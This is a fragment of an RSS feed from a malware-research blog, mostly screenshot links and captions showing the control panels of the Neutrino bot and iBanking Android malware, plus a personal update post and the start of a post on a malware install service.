Statistics:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJOnO8LEl8W5mWFIDsPgV190oZsCWXRPhqlFH2u5hJX87NKHJEuDQY6fEFgOL3lXnF9eDvqfyxHrjlIgXWM2tvb5xnwSPUjsclcTz4kuv8Wghboxl_7bzoIamc4HGlG5N9Z0eDMu2K-5E/s1600/2014-05-31_13-09-26.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJOnO8LEl8W5mWFIDsPgV190oZsCWXRPhqlFH2u5hJX87NKHJEuDQY6fEFgOL3lXnF9eDvqfyxHrjlIgXWM2tvb5xnwSPUjsclcTz4kuv8Wghboxl_7bzoIamc4HGlG5N9Z0eDMu2K-5E/s1600/2014-05-31_13-09-26.png&quot; height=&quot;640&quot; width=&quot;404&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Clients:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXndBlKUBBHylQDlTjVpHxZU-HkybWuZUs-7kRyJOW85RXXWc5td2u8m9p-oSk9cIrKXYlDf_JbBeIHGRaDd2bFHdljIyd79rpWU00S_wVdx0Z6pF0qHfDfEPtMBtdOkavodvUx_CXVM/s1600/2014-05-31_13-10-48.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXndBlKUBBHylQDlTjVpHxZU-HkybWuZUs-7kRyJOW85RXXWc5td2u8m9p-oSk9cIrKXYlDf_JbBeIHGRaDd2bFHdljIyd79rpWU00S_wVdx0Z6pF0qHfDfEPtMBtdOkavodvUx_CXVM/s1600/2014-05-31_13-10-48.png&quot; height=&quot;262&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Files:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggpVzdWGCtYKPVaXpry1QnTHOWCPUtnlQUWufJLsgBOcqCUcqFEtXIDB7OpQvBOCujiswvBCiogWGyeB8ApPU1KAdZ8tXAjzhBViUr9ln5qm2tpAvDz24TRPwNtlFUEKhyphenhyphencc6ksaJgXGs/s1600/2014-05-31_13-12-35.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggpVzdWGCtYKPVaXpry1QnTHOWCPUtnlQUWufJLsgBOcqCUcqFEtXIDB7OpQvBOCujiswvBCiogWGyeB8ApPU1KAdZ8tXAjzhBViUr9ln5qm2tpAvDz24TRPwNtlFUEKhyphenhyphencc6ksaJgXGs/s1600/2014-05-31_13-12-35.png&quot; height=&quot;230&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Logs:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTo9YnI0J-cAcSJcioQ_tCTuNbMXgrYc2AedCMX_mhJ1qefgCLLLHPZfu2v9lwE6x0GYvpWuXfvP9ghzvhP93FGjlkrfBlONdWRl2B-jiwGwgOmatnJkuMYb_lMjwB1Gmzm22qIMBieSQ/s1600/2014-05-31_13-12-26.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTo9YnI0J-cAcSJcioQ_tCTuNbMXgrYc2AedCMX_mhJ1qefgCLLLHPZfu2v9lwE6x0GYvpWuXfvP9ghzvhP93FGjlkrfBlONdWRl2B-jiwGwgOmatnJkuMYb_lMjwB1Gmzm22qIMBieSQ/s1600/2014-05-31_13-12-26.png&quot; height=&quot;230&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Settings:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGacmymqyEtXo258EHHmI096wMv_goQGcWj9iqbfFbcLxRtyclX4DE2fkOus-qJ0RN3ZnJJ4Hzvm-Cnq-JyN_Jk1peAboBL5XM694DX3x4hO_dDtZ7ET3TmEwKae93MgMFlgXxJwfR6vw/s1600/2014-05-31_13-12-20.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGacmymqyEtXo258EHHmI096wMv_goQGcWj9iqbfFbcLxRtyclX4DE2fkOus-qJ0RN3ZnJJ4Hzvm-Cnq-JyN_Jk1peAboBL5XM694DX3x4hO_dDtZ7ET3TmEwKae93MgMFlgXxJwfR6vw/s1600/2014-05-31_13-12-20.png&quot; height=&quot;230&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
</description><link>https://www.xylibox.com/2015/01/neutrino-bot.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEU_4r8zqbFksVyFYmD7ns3oUlcYz3LmdVEEUVYIlYABcqJxL0srOKu7SWplTyqFeMOEVahLkSBNczWLTNzL8nFpdHsUI5MG2ieAvmpbBgPL9r6DeottgaOB2Kf9TAm83qfdRYMT4jPiQ/s72-c/2014-05-31_13-27-32.png" height="72" width="72"/><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-5065446507325469524</guid><pubDate>Mon, 12 Jan 2015 20:47:00 +0000</pubDate><atom:updated>2015-01-12T21:47:32.559+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">iBanking</category><title>iBanking</title><description>iBanking is an android malware made to intercept voice and text informations.&lt;br /&gt;
The panel is poorly coded.&lt;br /&gt;
&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBAKvKawYlJBMh1iz3TbojA4_d009Iiumu0m5mQF8UHt5daBK_BRsYMcnDR9rQDFXdWoFF0CIhGTUSDYDN777h1hm-lA2PymHK2_HJf2bSV33a1_9oaFiaT5Bg3Up9rGMJjLbEf021qO8/s1600/16-02-2014+20-36-52.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBAKvKawYlJBMh1iz3TbojA4_d009Iiumu0m5mQF8UHt5daBK_BRsYMcnDR9rQDFXdWoFF0CIhGTUSDYDN777h1hm-lA2PymHK2_HJf2bSV33a1_9oaFiaT5Bg3Up9rGMJjLbEf021qO8/s1600/16-02-2014+20-36-52.png&quot; height=&quot;297&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Projects:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2rWaDzswTQUSa5zsjTFLFewVmfO1Eg1UBdDaTxXxThO3CW-WnVo_y6XBSr1dOlRwKWHwGBRFY-ShuPlc3gTuh2TReJzsLlxiXIHDJeAnuR2OKGSkojyEgL43Bn88qztTaLyPBi-rw2Fg/s1600/16-02-2014+20-38-16.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2rWaDzswTQUSa5zsjTFLFewVmfO1Eg1UBdDaTxXxThO3CW-WnVo_y6XBSr1dOlRwKWHwGBRFY-ShuPlc3gTuh2TReJzsLlxiXIHDJeAnuR2OKGSkojyEgL43Bn88qztTaLyPBi-rw2Fg/s1600/16-02-2014+20-38-16.png&quot; height=&quot;140&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Phone list:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9b4X2XCO3cDspOgyeXAGRkoPlNVAwhfAdQwaRFM1APH_xW1Vb06hzEVZROqhyphenhyphenAMMDr9877uNaWfhqqFBqeGck69Dua2KUKOwQaBOt0TfZttWiDFHow4NrbkUF-FkniuzNlJwFcUp5OSE/s1600/16-02-2014+20-39-50.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9b4X2XCO3cDspOgyeXAGRkoPlNVAwhfAdQwaRFM1APH_xW1Vb06hzEVZROqhyphenhyphenAMMDr9877uNaWfhqqFBqeGck69Dua2KUKOwQaBOt0TfZttWiDFHow4NrbkUF-FkniuzNlJwFcUp5OSE/s1600/16-02-2014+20-39-50.png&quot; height=&quot;252&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-7wEyRKPwYJL5FEC3EbhXY2JsmDIIu1qxrDHWis6NoPFoakwQQ7ya4-JLp8EWkERs3L9KlPkdVth3qz0Lh7oHTiHK3SZZCLpQEtwf-ngBTnt45Aylk3dnVMl_0TSYfngPOjLxlSRgfzM/s1600/16-02-2014+21-01-58.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-7wEyRKPwYJL5FEC3EbhXY2JsmDIIu1qxrDHWis6NoPFoakwQQ7ya4-JLp8EWkERs3L9KlPkdVth3qz0Lh7oHTiHK3SZZCLpQEtwf-ngBTnt45Aylk3dnVMl_0TSYfngPOjLxlSRgfzM/s1600/16-02-2014+21-01-58.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
SMS List:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmLv7jlFQ81veLZu1TffWWe_YWtcZfUQN4MetOf_wx9M8JHFoeQ61JHrdkJb9SkEhqLpmYd31a806RK9Agj1V3yx6Qukk9Rjynm9IWgRQN2SOBbTHf9SBMjwVWGyZ_BiIg1rqv_003QYk/s1600/16-02-2014+21-03-05.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmLv7jlFQ81veLZu1TffWWe_YWtcZfUQN4MetOf_wx9M8JHFoeQ61JHrdkJb9SkEhqLpmYd31a806RK9Agj1V3yx6Qukk9Rjynm9IWgRQN2SOBbTHf9SBMjwVWGyZ_BiIg1rqv_003QYk/s1600/16-02-2014+21-03-05.png&quot; height=&quot;190&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
All SMS (Incomming)&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfmAX4rd9Yz4AqUM74A8rU3RC9gMwDaMAE1suWGeELJlpdZPhPyvfUy8x89rdf0d7vMgwI2OHlqwwjGK8FLLJZuCR42hy_FE0SK2Yl6CAKeovmIT9Ej1WjOEPD0NjOmccVWs7ZlrUmi30/s1600/16-02-2014+21-35-30.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfmAX4rd9Yz4AqUM74A8rU3RC9gMwDaMAE1suWGeELJlpdZPhPyvfUy8x89rdf0d7vMgwI2OHlqwwjGK8FLLJZuCR42hy_FE0SK2Yl6CAKeovmIT9Ej1WjOEPD0NjOmccVWs7ZlrUmi30/s1600/16-02-2014+21-35-30.png&quot; height=&quot;178&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
All SMS (Outgoing):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixZJUJTNkC6_U3WEXZ-RiIwoqAsiPCMuJXU6hgQjKYCzpdIOuBAq5kZ4VRZKYiwYOH7kaCfv60XSovIIOeu2xdHEgTD8TRvBCNyA84RwZv1c4Fxm6KX9aiMzNucAM54Bu9U1UdhKnz0vg/s1600/16-02-2014+21-10-45.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixZJUJTNkC6_U3WEXZ-RiIwoqAsiPCMuJXU6hgQjKYCzpdIOuBAq5kZ4VRZKYiwYOH7kaCfv60XSovIIOeu2xdHEgTD8TRvBCNyA84RwZv1c4Fxm6KX9aiMzNucAM54Bu9U1UdhKnz0vg/s1600/16-02-2014+21-10-45.png&quot; height=&quot;190&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Call list (Incomming):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9V5rgiso6XDSpcHoZyEJuOrMfOzOn7kvKws0ITCCUOR5SSAzva8NT79SlfWAOsTGaZetNjqrdNSVfQHZrlsofS8Yl5vRL4oosEI-mZwNzj5oQgDisu80MLltHiDekGdA71DZx5vHNiXg/s1600/16-02-2014+21-14-48.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9V5rgiso6XDSpcHoZyEJuOrMfOzOn7kvKws0ITCCUOR5SSAzva8NT79SlfWAOsTGaZetNjqrdNSVfQHZrlsofS8Yl5vRL4oosEI-mZwNzj5oQgDisu80MLltHiDekGdA71DZx5vHNiXg/s1600/16-02-2014+21-14-48.png&quot; height=&quot;190&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Call list (Outgoing):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnkuRXmjjoGSP-lZBRLuKxFcE1rqA1s41FnV27MRpCt94z44Zv4Qn4sB2u1fu_zYAeYUA-Yg7Ed8SIkhyphenhyphenJmWd5fNlt4ovoQ0nw6hPcgtbn756CfqLJrRIjLyO1OUtuL3DNUPmQZLTmdQI/s1600/16-02-2014+21-18-52.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnkuRXmjjoGSP-lZBRLuKxFcE1rqA1s41FnV27MRpCt94z44Zv4Qn4sB2u1fu_zYAeYUA-Yg7Ed8SIkhyphenhyphenJmWd5fNlt4ovoQ0nw6hPcgtbn756CfqLJrRIjLyO1OUtuL3DNUPmQZLTmdQI/s1600/16-02-2014+21-18-52.png&quot; height=&quot;190&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Call list (Missed):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Ts0_hsGMiTv2UVv1p6qpQN_A2vR5PgzTOu7Fp8BCZy85kvxVGehgpaawMH7xjJxS7RfG8-iea5lKt7b2sykOyOlAREDAiMv0sfIDaFCFJ9f4A1xqHH9mA-jOap8WAxo8HzpdcpiV6F8/s1600/16-02-2014+21-22-37.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Ts0_hsGMiTv2UVv1p6qpQN_A2vR5PgzTOu7Fp8BCZy85kvxVGehgpaawMH7xjJxS7RfG8-iea5lKt7b2sykOyOlAREDAiMv0sfIDaFCFJ9f4A1xqHH9mA-jOap8WAxo8HzpdcpiV6F8/s1600/16-02-2014+21-22-37.png&quot; height=&quot;190&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Sounds:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLEygkvK2YfbrWObtJ8X_9k7iqUAcv47ni-BArWD0lBWuzUsxKTgi9792TM8yhaytPwWgNsTOkoEc4ZWYn107Dt6UgMsJxTrKrIF4MMQj9nU7PuGLE_zpo8lKUvSo00EapqhWiOsex-34/s1600/16-02-2014+21-26-36.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLEygkvK2YfbrWObtJ8X_9k7iqUAcv47ni-BArWD0lBWuzUsxKTgi9792TM8yhaytPwWgNsTOkoEc4ZWYn107Dt6UgMsJxTrKrIF4MMQj9nU7PuGLE_zpo8lKUvSo00EapqhWiOsex-34/s1600/16-02-2014+21-26-36.png&quot; height=&quot;83&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Contact list:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt-IKHN6kHudlPQdvShhyphenhyphenbYyb8zzVEa3siZeEId2o0dAh3G2D8rAbDr4awtx31tGgcokG2Uq3KuBw6XtBuh41mnc-WytbByeYAckNet95p_itFK0WDWf_KF4M1k42eLbSivq22Sx63Xd0/s1600/16-02-2014+21-27-25.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt-IKHN6kHudlPQdvShhyphenhyphenbYyb8zzVEa3siZeEId2o0dAh3G2D8rAbDr4awtx31tGgcokG2Uq3KuBw6XtBuh41mnc-WytbByeYAckNet95p_itFK0WDWf_KF4M1k42eLbSivq22Sx63Xd0/s1600/16-02-2014+21-27-25.png&quot; height=&quot;235&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Url report:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz60_-IQeMblEs9Q03oK_FJWV6ayBErO3OwGI0Yd-2xTR7J6XM2aS5CBDLEscAEkWDrozuiEzh-3EMnqLRtOquccGOma7JgifmssudaV1Be8qVZg4unOqUb0MaEy-AspTszfjC32Bvek4/s1600/16-02-2014+21-33-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz60_-IQeMblEs9Q03oK_FJWV6ayBErO3OwGI0Yd-2xTR7J6XM2aS5CBDLEscAEkWDrozuiEzh-3EMnqLRtOquccGOma7JgifmssudaV1Be8qVZg4unOqUb0MaEy-AspTszfjC32Bvek4/s1600/16-02-2014+21-33-13.png&quot; height=&quot;92&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
</description><link>https://www.xylibox.com/2015/01/ibanking.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBAKvKawYlJBMh1iz3TbojA4_d009Iiumu0m5mQF8UHt5daBK_BRsYMcnDR9rQDFXdWoFF0CIhGTUSDYDN777h1hm-lA2PymHK2_HJf2bSV33a1_9oaFiaT5Bg3Up9rGMJjLbEf021qO8/s72-c/16-02-2014+20-36-52.png" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-3256959065928710311</guid><pubDate>Sat, 20 Dec 2014 17:45:00 +0000</pubDate><atom:updated>2014-12-20T18:45:27.908+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">blog news</category><category domain="http://www.blogger.com/atom/ns#">happy new year</category><category domain="http://www.blogger.com/atom/ns#">life &amp; shit</category><category domain="http://www.blogger.com/atom/ns#">Xylibox</category><title>i/o</title><description>Wow, it&#39;s been a awhile since i haven&#39;t written anything new here...&lt;br /&gt;So to answer many questions.. no i&#39;m not dead, and will try to get active again a bit next year.&lt;br /&gt;
&lt;br /&gt;I&#39;m not writing this due to explanation requests or people worried (even if i got solicited many time to write something) but more because i&#39;m motivated again to write.&lt;br /&gt;
As i&#39;ve said many times to the recurrent e-mails i receive and continue to receive (even after 7 months of inactivity!)&lt;br /&gt;
I&#39;ve did a lot of changement in my life, and during this time i got better things to do than writing in a blog.&lt;br /&gt;
Principaly i had many personal issues to resolve. &lt;br /&gt;
It&#39;s also not the first time i repeat that i&#39;ve a life and that i&#39;ve always run this blog for fun and nonprofit like my other services such as &lt;a href=&quot;http://cybercrime-tracker.net/&quot;&gt;cybercrime-tracker.net&lt;/a&gt;&lt;br /&gt;
And sooner or later i will get bored and do a break although i&#39;ve continued to update CCT, to don&#39;t leave people with nothing.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKgmbK7f8u4y7cQ80C_fe3pm3CcHFCDT0rMXTAU8f_aTxVLFDKWK_Sdy4C1prG8XgBJYw51pgGDKm-VRTVD4u0zw3k8nACdQp74MeGPQnZzYPY6nyBOU4ZWT1iqb-tABYIeZ-uP1NjYEE/s1600/2014-12-20_16-39-17.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKgmbK7f8u4y7cQ80C_fe3pm3CcHFCDT0rMXTAU8f_aTxVLFDKWK_Sdy4C1prG8XgBJYw51pgGDKm-VRTVD4u0zw3k8nACdQp74MeGPQnZzYPY6nyBOU4ZWT1iqb-tABYIeZ-uP1NjYEE/s1600/2014-12-20_16-39-17.png&quot; height=&quot;320&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
I changed of job also and shifted in the energy sector.&lt;br /&gt;
I wanted to get a job who combine my passion for mechanic and electronic.&lt;br /&gt;
And now i&#39;m winding turbo-alternators for nuclear/hydraulic power plants around the world and governmental organisations. (pretty cool, huh?)&lt;br /&gt;
I can&#39;t tell you details obviously due to confidentiality clauses as it&#39;s critical, but making those huge machines/projects are quite awesome and the job is very meticulous.&lt;br /&gt;
&lt;br /&gt;
I&#39;ve joined also the administration of my local &lt;a href=&quot;http://hackaday.io/hackerspace/1374-hackgyver&quot;&gt;hackerspace&lt;/a&gt;, and now holds the position of treasurer.&lt;br /&gt;I&#39;m doing also various workshops mostly electronic/borderline related who take me time to prepare and organize.&lt;br /&gt;
In parallel i experiment myself also a lot, those who follow my youtube/twitter activity probably know what i mean, i received 2 day ago hydrofluoric acid.&lt;br /&gt;&lt;br /&gt;
2014 started a bit bad for me as i had a car crash the day of christmas and got the clavicle broken. Anyway globally it was a nice year, and off my blog i&#39;ve met a lot of people like Horgh and many others.&lt;br /&gt;
Sadly i wasn&#39;t able to go to BotConf neither DahuCon this year due to my job... so maybe next year !&lt;br /&gt;
&lt;br /&gt;
I&#39;ve worked a bit also with &lt;a href=&quot;http://hackerstrip.com/&quot;&gt;Hackerstrip&lt;/a&gt; and released recently some codes for &lt;a href=&quot;http://vxheaven.org/vx.php?id=zd12&amp;amp;lang=en&amp;amp;fid=2017#f2017&quot;&gt;DarK-CodeZ #6&lt;/a&gt;, nothing fancy but it was fun to participate, thanks guys.&lt;br /&gt;
So that all, see you in 2015 for throwing cobblestones and breaking bones !</description><link>https://www.xylibox.com/2014/12/io.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKgmbK7f8u4y7cQ80C_fe3pm3CcHFCDT0rMXTAU8f_aTxVLFDKWK_Sdy4C1prG8XgBJYw51pgGDKm-VRTVD4u0zw3k8nACdQp74MeGPQnZzYPY6nyBOU4ZWT1iqb-tABYIeZ-uP1NjYEE/s72-c/2014-12-20_16-39-17.png" height="72" width="72"/><thr:total>7</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-8817311472227855523</guid><pubDate>Mon, 05 May 2014 11:16:00 +0000</pubDate><atom:updated>2014-05-05T17:59:16.912+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">fakeav</category><category domain="http://www.blogger.com/atom/ns#">FeodalCash</category><category domain="http://www.blogger.com/atom/ns#">Loader service</category><category domain="http://www.blogger.com/atom/ns#">malware affiliate</category><category domain="http://www.blogger.com/atom/ns#">Malwox</category><category domain="http://www.blogger.com/atom/ns#">Mayachok</category><category domain="http://www.blogger.com/atom/ns#">Ransomware</category><category domain="http://www.blogger.com/atom/ns#">russian locker</category><category domain="http://www.blogger.com/atom/ns#">Severa</category><category domain="http://www.blogger.com/atom/ns#">Spam</category><category domain="http://www.blogger.com/atom/ns#">Spambot</category><category domain="http://www.blogger.com/atom/ns#">SpyEye</category><category domain="http://www.blogger.com/atom/ns#">winlock</category><category domain="http://www.blogger.com/atom/ns#">ZeuS</category><title>Install service for Malware affiliates and individuals</title><description>This install service was running since a long time but the server recently died.&lt;br /&gt;
People targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.&lt;br /&gt;
&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCsgtqpgKKmpIg7FWkHDSbUwOt6vPw3wDSyPwdIgww6WiQjJ-RK3I1POvAR9sqd06uBvY8DDJwNq_PlZtiN3irm2Kdxsb9RmXYX6y5CzmyxS4uLo0yxzwCfnnh9pKJE6gct5Ej_jWwqC4/s1600/15-07-2013+14-28-03.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCsgtqpgKKmpIg7FWkHDSbUwOt6vPw3wDSyPwdIgww6WiQjJ-RK3I1POvAR9sqd06uBvY8DDJwNq_PlZtiN3irm2Kdxsb9RmXYX6y5CzmyxS4uLo0yxzwCfnnh9pKJE6gct5Ej_jWwqC4/s400/15-07-2013+14-28-03.png&quot; height=&quot;400&quot; width=&quot;325&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Statistics by days:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
